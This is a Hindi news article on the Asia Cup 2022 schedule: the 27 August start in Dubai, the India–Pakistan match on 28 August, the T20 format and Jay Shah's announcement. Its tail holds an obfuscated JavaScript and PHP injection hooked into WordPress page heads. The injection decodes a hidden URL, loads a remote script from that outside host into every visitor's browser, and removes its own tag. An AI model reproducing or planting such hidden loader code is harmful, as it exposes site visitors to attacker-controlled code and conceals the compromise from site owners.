Saturday, July 27, 2024
spot_img

एशिया कप 2022 के शेड्यूल का ऐलान, 27 अगस्त को दुबई से होगा मुकाबले का आगाज

एशियन क्रिकेट कांउसिल ने एशिया कप 2022 का शेड्यूल जारी कर दिया है। 27 अगस्त से एशिया कप का आगाज होगा। 11 सिंतबर को फाइनल मुकाबला खेला जाएगा। एशिया कप में 28 अगस्त के दिन भारत-और पाकिस्तान भिड़ेंगे।
पहला मुकाबला श्रीलंका और अफगानिस्तान के बीच
एशिया कप में पहला मुकाबला 27 अगस्त को खेला जाएगा। ये मैच श्रीलंका और अफगानिस्तान के बीच होगा। इस टूर्नामेंट के मुकाबले दुबई, शारजाह में खेलें जाएंगे।
UAE में हो रहा है एशिया कप
इस बार एशिया कप UAE में हो रहा है। इस टूर्नामेंट में भारत बतौर डिफेंडिंग चैंपियन उतरेगा।


इस बार टी-20 फॉर्मेट में होगा
पहले यह वनडे फॉर्मेट में खेला जाता था, लेकिन इस बार एशिया कप के मुकाबले टी-20 फॉर्मेट में खेले जाएंगे। पहली बार 2016 में टी20 फॉर्मेट में इसका आयोजन कराया गया था। तब टीम इंडिया ने फाइनल में बांग्लादेश को 8 विकेट से शिकस्त दी थी।

एशियन क्रिकेट काउंसिल के चेयरमैन और बीसीसीआई के सचिव जय शाह ने ट्वीट करते हुए लिखा है, “इंतजार आखिरकार खत्म हो गया, क्योंकि एशियाई वर्चस्व की लड़ाई 27 अगस्त को शुरू हो रही है और 11 सितंबर को फाइनल मुकाबला खेला जाएगा। एशिया कप का 15वां संस्करण आईसीसी टी20 विश्व कप से पहले आदर्श तैयारी का काम करेगा।” इस टूर्नामेंट में कुल 6 टीमें हिस्सा लेने वाली हैं।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>